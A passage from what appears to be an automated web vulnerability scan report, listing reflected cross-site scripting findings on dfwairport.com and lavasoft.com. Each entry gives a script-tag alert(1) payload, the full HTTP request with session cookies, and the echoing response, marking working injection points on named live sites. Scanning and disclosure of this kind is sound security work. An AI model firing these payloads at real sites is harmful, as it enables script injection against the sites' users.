Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /guide/index.php?29a4f"><script>alert(1)</script>3f28e5e818a=1 HTTP/1.1
Host: www.dfwairport.com
Proxy-Connection: keep-alive
Referer: http://www.dfwairport.com/globalentry/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ot38qjf16m69l8r7io24208g56; __utma=109015197.1644725450.1315416751.1315416751.1315416751.1; __utmb=109015197.1.10.1315416751; __utmc=109015197; __utmz=109015197.1315416751.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.1
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 07 Sep 2011 12:33:52 GMT
Content-Length: 54379
ETag: "pv4d2448c074781b449d6a2a8f5d8f4bad"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, post-check=0, pre-check=0
Pragma: no-cache
X-PvInfo: [S10201.C29081.A24933.RA0.G0.U90016633].[OT/html.OG/pages]
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv=
...[SNIP]...
<a href="mailto:&body=http://www.dfwairport.com/guide/index.php?29a4f"><script>alert(1)</script>3f28e5e818a=1/" style="font-size:9px;">
...[SNIP]...

1.144. http://www.lavasoft.com/ [domain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /

Issue detail

The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b22e'><script>alert(1)</script>8a5fb0d26dc was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:10 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:10 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27364
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name='description' c
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc'>
...[SNIP]...

1.145. http://www.lavasoft.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bcb9c'><script>alert(1)</script>0c3711a31a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bcb9c'><script>alert(1)</script>0c3711a31a5=1 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:27:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:08 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27359
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name='description' c
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/?bcb9c'><script>alert(1)</script>0c3711a31a5=1'>
...[SNIP]...

1.146. http://www.lavasoft.com/css/feedback.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/feedback.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2aba5'><script>alert(1)</script>c2049abbabc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css2aba5'><script>alert(1)</script>c2049abbabc/feedback.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css2aba5'><script>alert(1)</script>c2049abbabc/feedback.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.147. http://www.lavasoft.com/css/feedback.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/feedback.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70b40'><script>alert(1)</script>b2096c0958d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/feedback.css70b40'><script>alert(1)</script>b2096c0958d?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/feedback.css70b40'><script>alert(1)</script>b2096c0958d?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.148. http://www.lavasoft.com/css/footer.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/footer.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fd00'><script>alert(1)</script>18f3446347d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9fd00'><script>alert(1)</script>18f3446347d/footer.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10638
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css9fd00'><script>alert(1)</script>18f3446347d/footer.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.149. http://www.lavasoft.com/css/footer.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/footer.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90845'><script>alert(1)</script>d6c36072837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/footer.css90845'><script>alert(1)</script>d6c36072837?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10638
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/footer.css90845'><script>alert(1)</script>d6c36072837?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.150. http://www.lavasoft.com/css/home.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a3fd'><script>alert(1)</script>2503f3b109a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css5a3fd'><script>alert(1)</script>2503f3b109a/home.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css5a3fd'><script>alert(1)</script>2503f3b109a/home.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.151. http://www.lavasoft.com/css/home.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb92c'><script>alert(1)</script>e031a800279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.csscb92c'><script>alert(1)</script>e031a800279?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/home.csscb92c'><script>alert(1)</script>e031a800279?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.152. http://www.lavasoft.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0fcf'><script>alert(1)</script>1bfc0782f6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa0fcf'><script>alert(1)</script>1bfc0782f6d/main.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/cssa0fcf'><script>alert(1)</script>1bfc0782f6d/main.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.153. http://www.lavasoft.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a0f'><script>alert(1)</script>8a0b8342e83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css71a0f'><script>alert(1)</script>8a0b8342e83?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/main.css71a0f'><script>alert(1)</script>8a0b8342e83?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.154. http://www.lavasoft.com/css/print_lavasoft.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/print_lavasoft.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b62'><script>alert(1)</script>1aabc7e254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssd2b62'><script>alert(1)</script>1aabc7e254/print_lavasoft.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=216d0%250d%250a219d2569ef4; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10645
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/cssd2b62'><script>alert(1)</script>1aabc7e254/print_lavasoft.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.155. http://www.lavasoft.com/css/print_lavasoft.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/print_lavasoft.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 502bc'><script>alert(1)</script>e34a2f2501e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/print_lavasoft.css502bc'><script>alert(1)</script>e34a2f2501e?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=216d0%250d%250a219d2569ef4; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10646
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/print_lavasoft.css502bc'><script>alert(1)</script>e34a2f2501e?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.156. http://www.lavasoft.com/css/products.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/products.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fb6'><script>alert(1)</script>1d5f7324bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css48fb6'><script>alert(1)</script>1d5f7324bb1/products.css?38180ee2adff20f2975ec0c47808bb0e HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
